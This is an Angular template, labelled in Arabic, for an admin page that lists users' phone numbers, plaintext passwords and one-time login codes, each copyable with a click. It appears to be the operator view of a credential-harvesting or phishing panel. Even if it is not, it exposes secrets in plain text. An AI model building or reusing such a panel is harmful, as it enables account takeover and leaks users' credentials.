<div class="users-page">

  <div *ngIf="apiMessage"
       [ngClass]="{'alert': true, 'success': apiMessageType==='success', 'error': apiMessageType==='error'}"
       style="margin: 0 auto 20px; text-align: center;">
    {{ apiMessage }}
  </div>

  <div class="action-buttons-vertical" *ngIf="hasDeletedUsers">
    <button class="btn btn-danger" (click)="deleteusers()">حذف المستخدمين</button>
  </div>

  <table class="users-table" *ngIf="users.length > 0" dir="rtl">
    <thead>
      <tr>
        <th>رقم الهاتف</th>
        <th>كلمة المرور</th>
        <th>رموز الدخول</th>
      </tr>
    </thead>
    <tbody>
     <tr *ngFor="let user of users">
  <td (click)="copyToClipboard(user.phone)">
    {{ user.phone }}
  </td>

  <td (click)="copyToClipboard(user.password)">
    {{ user.password }}
  </td>

  <td>
    <ul>
      <li
        *ngFor="let otp of user.otPs"
        (click)="copyToClipboard(otp)">
        {{ otp }}
      </li>
    </ul>
  </td>
</tr>
    </tbody>
  </table>

  <div *ngIf="users.length === 0" class="empty-cart">
    لا يوجد مستخدمين للعرض
  </div>

  <div class="pagination" *ngIf="users.length > 0 && totalpages > 1">
    <button
      class="btn"
      (click)="previousPage()"
      [disabled]="currentpage === 1">
      السابق
    </button>

    <span>
      الصفحة {{ currentpage }} من {{ totalpages }}
    </span>

    <button
      class="btn"
      (click)="nextPage()"
      [disabled]="currentpage === totalpages">
      التالي
    </button>
  </div>

</div>